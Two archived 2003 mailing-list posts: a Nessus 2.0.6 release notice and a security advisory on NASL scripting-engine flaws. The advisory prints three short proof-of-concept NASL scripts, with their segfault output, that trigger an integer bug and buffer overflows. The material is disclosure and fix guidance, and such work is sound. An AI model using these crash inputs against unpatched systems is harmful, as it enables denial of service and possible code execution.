linux, säkerhet

102380 2003-05-22  23:59  /47 rader/  <je@sekure.net>
Importerad: 2003-05-22  23:59  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4982>
Ärende: Potential security vulnerability in Nessus
------------------------------------------------------------

See below,

/jonas

---------- Forwarded message ----------
Date: Thu, 22 May 2003 17:16:05 -0400
From: Renaud Deraison <deraison@nessus.org>
To: nessus-announce@list.nessus.org
Subject: Nessus 2.0.6 has been released


Nessus 2.0.6 has been released. It fixes a potential security
vulnerability in libnasl as well as some other buglets.

There are some flaws in libnasl which might let a script break out of
its sandboxed environment and execute arbitrary commands on the
nessusd host.  To exploit these flaws, an attacker would need to have
a valid Nessus account as well as the ability to upload arbitrary
Nessus plugins in the Nessus server (this option is disabled by
default).

Not that these issues can NOT be exploited by a tested host to crash
nessusd remotely.

. Solution

Upgrade to Nessus 2.0.6 available at :
	http://ftp.nessus.org/nessus/nessus-2.0.6/
	ftp://ftp.nessus.org/pub/nessus/nessus-2.0.6/

. Workaround

Make sure the option 'plugins_upload' is set to 'no' in nessusd.conf

. Thanks

"Sir Mordred" <mordred@s-mail.com> discovered some ways to crash NASL
scripts by sending bad parameters to insstr(), ftp_log_in(), and
other functions.  Upon investigation, we fixed similar issues in
other nasl functions as well as in libnessus.


-- 
Renaud Deraison
The Nessus Project
http://www.nessus.org
(102380) / <je@sekure.net>/---------------(Ombruten)
102457 2003-05-23  15:07  /116 rader/ Sir Mordred <mordred@s-mail.com>
Importerad: 2003-05-23  15:07  av Brevbäraren
Extern mottagare: full-disclosure@lists.netsys.com
Mottagare: Bugtraq (import) <4992>
Ärende: nessus NASL scripting engine security issues
------------------------------------------------------------
// @(#)Security advisory: Nessus NASL scripting engine security issues

Release date: May 23, 2003 
Name: Nessus NASL scripting engine security issues
Author: Sir Mordred <mordred@s-mail.com>

I. DESCRIPTION

The "Nessus" Project aims to provide to the internet community a
free, powerful, up-to-date and easy to use remote security scanner.
Nessus is very fast, reliable and has a modular architecture that
allows you to fit it to your needs.  Please visit
http://www.nessus.org for more information about Nessus.

II. DETAILS

There exists some vulnerabilities in NASL scripting engine.  To
exploit these flaws, an attacker would need to have a valid Nessus
account as well as the ability to upload arbitrary Nessus plugins in
the Nessus server (this option is disabled by default) or he/she
would need to trick a user somehow into running a specially crafted
nasl script.

Not that these issues can NOT be exploited by a tested host to crash
nessusd remotely.

* ISSUE 1 - Integer handling vulnerability in insstr() function

Vulnerability is triggered by a negative fourth argument:

$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);

$ nasl t1.nasl ** WARNING : packet forgery will not work ** as NASL
is not running as root [1384](t1.nasl)  insstr: warning! 1st index 3
greater than 2nd index -3 Segmentation fault (core dumped)

* ISSUE 2 - Buffer overflow in scanner_add_port() function

Overflow is triggered by very long 'proto' argument:

$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));

$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

* ISSUE 3 - Buffer overflow in ftp_log_in() function

Overflow is triggered by very long 'user'/'pass' arguments:

$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:
crap(data:'A',length:8192)); 

$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

III. VERSIONS TESTED

Linux RedHat 7.2

$ nasl -v | grep nasl
nasl 2.0.5

IV. VENDOR STATUS

New nessus 2.0.6 packages fixes these issues.

V. WORKAROUND

Make sure the option 'plugins_upload' is set to 'no' in nessusd.conf
and don't run unstrusted nasl scripts.

VI. CREDITS

Hank Leininger <hlein@progressive-comp.com> requested the source code
audit for some opensource projects and for nessus in particular.

Sir Mordred <mordred@s-mail.com> discovered the issues.

Renaud Deraison <deraison@nessus.org> fixed them in an hour after
being notified.

VII. ABOUT

I offering the absolutely free source code audit for opensourced
products. The programming languages acceptable for audit are: Perl,
Python, PHP, ASP, C/C++, Java. I will accept almost any code in these
languages which runs on Unix/Windows platforms.

All you need is to send the email to mordred@s-mail.com with the
subject "Security audit: source code" and get the form in which you
will answer several questions, such as the description of the
product, the details of obtaining the source code, acceptable period
of audit and so on.

After audit, you will receive the full description of vulnerabilities
found, along with the advices that will help you to fix them
properly. When you fix the vulnerabilities there should be released a
public security advisory in which the fix information will be
contained and also i will be properly credited.



________________________________________________________________________
This letter has been delivered unencrypted. We'd like to remind you
that the full protection of e-mail correspondence is provided by
S-mail encryption mechanisms if only both, Sender and Recipient use
S-mail.  Register at S-mail.com: http://www.s-mail.com
(102457) /Sir Mordred <mordred@s-mail.com>/(Ombruten)